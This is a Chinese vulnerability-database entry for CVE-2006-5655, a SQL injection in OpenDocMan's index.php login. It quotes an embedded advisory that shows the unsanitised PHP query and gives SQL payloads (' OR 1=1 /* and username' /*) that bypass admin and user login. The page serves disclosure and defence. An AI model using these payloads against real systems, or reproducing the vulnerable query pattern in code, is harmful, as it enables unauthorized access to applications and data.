OpenDocMan index.php SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1192993 漏洞类型 SQL注入
发布时间 2006-11-02 更新时间 2006-11-06
CVE编号 CVE-2006-5655 CNNVD-ID CNNVD-200611-029
漏洞平台 N/A CVSS评分 7.5
|漏洞来源
https://cxsecurity.com/issue/WLB-2006110012
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200611-029
|漏洞详情
OpenDocMan中的index.php存在SQL注入漏洞,远程攻击者可以通过用户名参数执行任意SQL命令。
|漏洞EXP
########################################################################

# opendocman <= 1.2p3 Bypass admin/user Login
# affected to opendocman-1.2rc3
# Download Source : http://www.opendocman.com/?page_id=14
#
# Found By        : k1tk4t - k1tk4t[4t]newhack.org
# Location        : Indonesia   --  #newhack[dot]org @irc.dal.net
########################################################################

file;
index.php
########################################################################

bugs;
$query = "SELECT id, username, password FROM user WHERE username = '$frmuser' AND password = password('$frmpass')";
        $result = mysql_query("$query") or die ("Error in query: $query. " . mysql_error());
########################################################################

exploit/POC;
if magic_quotes_gpc = Off -- u can do this;

Login administrator
username : ' OR 1=1 /*
password : blank

Login User
username : username' /*
password : blank
########################################################################

Thanks;
str0ke
xoron [www.xoron.biz]
[mR]opt1lc,VaL,y3dips,lirva32,the_day,K-159 
evilcode,illibero,NoGe,nyubi,x-ace,ghoz,
home_edition2001,matdhule,iFX,
and for all(friend's&enemy)
@irc.dal.net
#newhack[dot]org [all member&staff]
#e-c-h-o [all member echo community]
#nyubicrew [all member solpotcrew community]
#asiahacker [all member asiahacker community]
|参考资料

来源:XF
名称:opendocman-username-sql-injection(29909)
链接:http://xforce.iss.net/xforce/xfdb/29909
来源:BID
名称:20809
链接:http://www.securityfocus.com/bid/20809
来源:BUGTRAQ
名称:20061030opendocman<=1.2p3Bypassadmin/userLogin
链接:http://www.securityfocus.com/archive/1/archive/1/450058/100/0/threaded
来源:SREASON
名称:1809
链接:http://securityreason.com/securityalert/1809